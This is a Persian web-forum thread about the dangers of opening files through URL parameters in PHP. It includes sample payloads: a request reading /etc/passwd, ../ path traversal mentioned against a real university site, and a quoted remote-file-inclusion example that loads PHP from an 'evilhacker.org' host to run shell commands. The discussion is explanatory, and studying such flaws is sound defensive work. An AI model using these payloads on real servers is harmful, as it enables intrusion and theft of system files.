نمایش نتایج 1 تا 10 از 10

نام تاپیک: مشکل باز کردن فایلها در برنامه های تحت وب چیست؟

  1. #1

    مشکل باز کردن فایلها در برنامه های تحت وب چیست؟

    چرا می گن باز کردن فایل ها بوسیله متغییر خطرناکه؟(مرور فایل های رو وب سرور را کنار بگذاریم)
    مثلا ممکن است چیزی مثل این داشته باشیم
    www.example.com/file.php?file=thefile
    اگر اجازه مرور وب سرور از این اسکریپت گرفته بشه آیا می تونه خطرناک باشه
    (چنکه تنها می تونه فایل های خارجی را باز کنه مثلا یاهوو رو ببینه)
    Artists use lies to tell the truth while politicians use them to cover the truth up

  2. #2
    . آواتار oxygenws
    تاریخ عضویت
    دی 1382
    محل زندگی
    تهران/مشهد
    پست
    6,333
    چون اگر بد برنامه نویسی بشه و امنیت سرور کمی کم باشه باعث ایجاد مشکلات زیادی می شه، مثلا:
    www.example.com/file.php?file=/etc/passwd
    این خط می تونه فایل پسورد های لینوکس رو در بیاره و نشون بده یا ....

    به هر حال، از چندین راه می شه جلوی این عملیات رو گرفت. اما اگه یادت باشه، من گفتم اگر بد برنامه نویسی بشه. (چیزی شبیه register_globals در PHP که ذاتا هیچ خطری نداره ولی کافیه شرایط مساعد باشه و برنامه نویس کمی گاگول. البته خطر register_globals از این مشکلی که شما مطرح کردید به مراتب کمتره)
    ایمیل من
    سایت من

    عضویت در جامعه‌ی اهدای عضو

    Direct PGP key: http://tinyurl.com/66q5cy
    PGP key server: keyserver.ubuntu.com
    PGP name to search: omidmottaghi

  3. #3
    اگر اجازه مرور وب سرور از این اسکریپت گرفته بشه آیا می تونه خطرناک باشه
    گفتم جز این
    Artists use lies to tell the truth while politicians use them to cover the truth up

  4. #4
    . آواتار oxygenws
    تاریخ عضویت
    دی 1382
    محل زندگی
    تهران/مشهد
    پست
    6,333
    چون اگر بد برنامه نویسی بشه و امنیت سرور کمی کم باشه باعث ایجاد مشکلات زیادی می ش
    من مشکل دیگه ای به ذهنم نمی رسه.
    ایمیل من
    سایت من

    عضویت در جامعه‌ی اهدای عضو

    Direct PGP key: http://tinyurl.com/66q5cy
    PGP key server: keyserver.ubuntu.com
    PGP name to search: omidmottaghi

  5. #5

    In this case, every answer was negative. Time to play! Of course, it is now possible to read all the files the httpd user has read access for. But what is even more exciting is the fact that the include() function is used to include the HTML file. Consider this:

    http://example.com/page.php?i=http://evilhacker.org/exec.html

    Where exec.html contains a couple of lines of code:

    <?php
    passthru ('id');
    passthru ('ls -al /etc');
    passthru ('ping -c 1 evilhaxor.org');
    passthru ('echo You have been hax0red | mail root');
    ?>

    http://www.zend.com/zend/art/art-oertli.php
    منظورم چیزی که در قسمت مربوطه در این مقاله گفته شده هر چی فکر می کنم می بینم باز شدن یک فایل خارجی نباید تاثیری داشته باشه
    Artists use lies to tell the truth while politicians use them to cover the truth up

  6. #6
    . آواتار oxygenws
    تاریخ عضویت
    دی 1382
    محل زندگی
    تهران/مشهد
    پست
    6,333
    نگاه کن، شاید اینطور روش های هک (دسترسی به سرور) رو بشه به دو دستهء راه دور و محلی تقسیم کرد.
    اگر دسترسی محلی با زبونی مثل PHP ممکن باشه، با این روشی که شما می گی هم می شه به سرور دسترسی پیدا کرد (البته قطعا باید این فایل رو سرور نصب باشه) این یعنی همون امنیت پایین که خودتون هم گفتید.
    در غیر این صورت مشکلی نیست :) و سر جناب هکر به سنگ می خوره.

    موفق باشید، امید
    ایمیل من
    سایت من

    عضویت در جامعه‌ی اهدای عضو

    Direct PGP key: http://tinyurl.com/66q5cy
    PGP key server: keyserver.ubuntu.com
    PGP name to search: omidmottaghi

  7. #7
    کاربر دائمی آواتار jirjirakk
    تاریخ عضویت
    بهمن 1381
    محل زندگی
    wwwroot
    پست
    660
    سایت یکی از دانشگاه ها که با پی اچ پی نوشته شده به علت چک نکردن متغییر های ارسالی دچار همین مشکل هستش و میتوان با چند تا /../../.. به عقب و یک /etc/passwd به یه جاهای خوبی رسید و ...

  8. #8
    . آواتار oxygenws
    تاریخ عضویت
    دی 1382
    محل زندگی
    تهران/مشهد
    پست
    6,333
    نقل قول نوشته شده توسط jirjirakk
    سایت یکی از دانشگاه ها که با پی اچ پی نوشته شده به علت چک نکردن متغییر های ارسالی دچار همین مشکل هستش و میتوان با چند تا /../../.. به عقب و یک /etc/passwd به یه جاهای خوبی رسید و ...
    هه هه هه، با شناختی که ازت دارم، فکر می کنم بدونم کدوم دانشگاه رو می گی :)
    ایمیل من
    سایت من

    عضویت در جامعه‌ی اهدای عضو

    Direct PGP key: http://tinyurl.com/66q5cy
    PGP key server: keyserver.ubuntu.com
    PGP name to search: omidmottaghi

  9. #9
    کاربر دائمی آواتار jirjirakk
    تاریخ عضویت
    بهمن 1381
    محل زندگی
    wwwroot
    پست
    660
    نچ (:D) یکی از دانشگاه های طرف های خودمونه اما نه اون یکی که تو فکر میکنی :P (دانشگاه آزاد نیستش)
    اون ها اومدن یک صفحه اصلی طراحی کردن و با پاس دادن دو متغییر یکی برای صفحه اصلی و دیگری برای منوی سمت چپشون که توی این صفحه اصلی میاد و این دو تا فایل و که به عنوان پارامتر پاس میده باز میکنه و ...
    و جالبناک ترش اینه که این سایت توسط 3 شایدم 4 تا از اساتید لیسانس و فوق لیسانس همون دانشگاه طراحی شده

  10. #10
    و جالبناک ترش اینه که این سایت توسط 3 شایدم 4 تا از اساتید لیسانس و فوق لیسانس همون دانشگاه طراحی شده
    در میخانه را بگشا که ار خانقه نگشود********** گرت باور بود یا نه سخن این بود و ما گفتیم
    حالا کسی چیز دیگه ای به نظرش نمی رسه؟
    Artists use lies to tell the truth while politicians use them to cover the truth up

قوانین ایجاد تاپیک در تالار

  • شما نمی توانید تاپیک جدید ایجاد کنید
  • شما نمی توانید به تاپیک ها پاسخ دهید
  • شما نمی توانید ضمیمه ارسال کنید
  • شما نمی توانید پاسخ هایتان را ویرایش کنید
  •